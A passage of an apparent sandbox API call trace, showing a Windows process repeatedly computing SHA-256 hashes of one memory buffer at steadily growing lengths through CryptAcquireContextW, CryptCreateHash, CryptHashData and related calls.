[0189.572] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.572] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.572] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.573] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0189.573] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd4a0 [0189.573] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acd4a0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd4a0, pdwDataLen=0xce12c) returned 1 [0189.573] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0189.573] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.573] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.573] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.573] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0189.573] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.573] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd470 [0189.573] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acd470, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd470, pdwDataLen=0xce12c) returned 1 [0189.573] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.573] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.573] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.574] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.574] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0189.574] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.574] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd110 [0189.574] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acd110, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd110, pdwDataLen=0xce12c) returned 1 [0189.574] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.574] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.574] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.574] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.575] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0189.575] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd320 [0189.575] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32acd320, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd320, pdwDataLen=0xce12c) returned 1 [0189.575] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.575] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.575] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ed0) returned 1 [0189.575] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.575] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0189.575] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.575] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd350 [0189.575] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32acd350, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd350, pdwDataLen=0xce12c) returned 1 [0189.575] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0189.575] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.575] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.576] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.576] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0189.576] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.576] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accb70 [0189.576] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32accb70, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accb70, pdwDataLen=0xce12c) returned 1 [0189.576] CryptDestroyHash (hHash=0x3396f200) returned 1 [0189.576] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.576] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.577] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.577] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0189.577] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.577] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accd20 [0189.577] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32accd20, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accd20, pdwDataLen=0xce12c) returned 1 [0189.577] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.577] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.577] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.577] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.577] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0189.577] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accde0 [0189.578] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32accde0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accde0, pdwDataLen=0xce12c) returned 1 [0189.578] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.578] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.578] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.578] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.578] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0189.578] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.578] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd560 [0189.578] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acd560, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd560, pdwDataLen=0xce12c) returned 1 [0189.578] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.578] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.578] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.579] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.579] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0189.579] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.579] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acccc0 [0189.579] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32acccc0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acccc0, pdwDataLen=0xce12c) returned 1 [0189.579] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.579] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.579] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.580] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.580] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0189.580] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.580] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accf90 [0189.580] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32accf90, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accf90, pdwDataLen=0xce12c) returned 1 [0189.580] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.580] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.580] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.580] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.580] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0189.580] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.582] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acce10 [0189.582] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acce10, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acce10, pdwDataLen=0xce12c) returned 1 [0189.582] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.582] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.583] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.583] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.583] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0189.583] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.583] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd4d0 [0189.583] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acd4d0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd4d0, pdwDataLen=0xce12c) returned 1 [0189.583] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.583] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.583] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.584] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.584] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0189.584] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.584] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accff0 [0189.584] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32accff0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accff0, pdwDataLen=0xce12c) returned 1 [0189.584] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.584] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.584] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.585] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.585] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0189.585] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd380 [0189.585] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acd380, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd380, pdwDataLen=0xce12c) returned 1 [0189.585] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.585] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.585] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.585] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.585] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0189.585] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.585] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd3e0 [0189.585] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acd3e0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd3e0, pdwDataLen=0xce12c) returned 1 [0189.585] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.585] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.586] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.587] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.587] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0189.587] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd650 [0189.587] CryptGetHashParam (in: hHash=0x3396eda0, dwParam=0x2, pbData=0x32acd650, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd650, pdwDataLen=0xce12c) returned 1 [0189.587] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0189.587] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.587] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.587] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.587] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0189.587] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.587] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd5c0 [0189.587] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd5c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd5c0, pdwDataLen=0xce12c) returned 1 [0189.587] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.588] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.588] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.588] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.588] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0189.588] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.588] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accd80 [0189.588] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32accd80, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accd80, pdwDataLen=0xce12c) returned 1 [0189.588] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.588] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.588] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.589] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.589] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0189.589] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.589] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd5f0 [0189.589] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32acd5f0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd5f0, pdwDataLen=0xce12c) returned 1 [0189.589] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0189.589] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.589] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.589] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.589] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0189.590] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd680 [0189.590] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acd680, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd680, pdwDataLen=0xce12c) returned 1 [0189.590] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.590] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.590] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.590] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.590] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0189.590] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.590] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd6b0 [0189.590] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acd6b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd6b0, pdwDataLen=0xce12c) returned 1 [0189.590] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.590] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.590] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.591] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.591] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0189.591] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.591] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd6e0 [0189.591] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acd6e0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd6e0, pdwDataLen=0xce12c) returned 1 [0189.591] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.591] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.591] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.592] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.592] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0189.592] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd740 [0189.592] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acd740, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd740, pdwDataLen=0xce12c) returned 1 [0189.592] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.592] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.592] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.592] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.592] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0189.592] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.592] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accbd0 [0189.592] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32accbd0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accbd0, pdwDataLen=0xce12c) returned 1 [0189.592] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.593] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.593] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.593] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.593] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0189.593] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.593] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acccf0 [0189.593] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32acccf0, 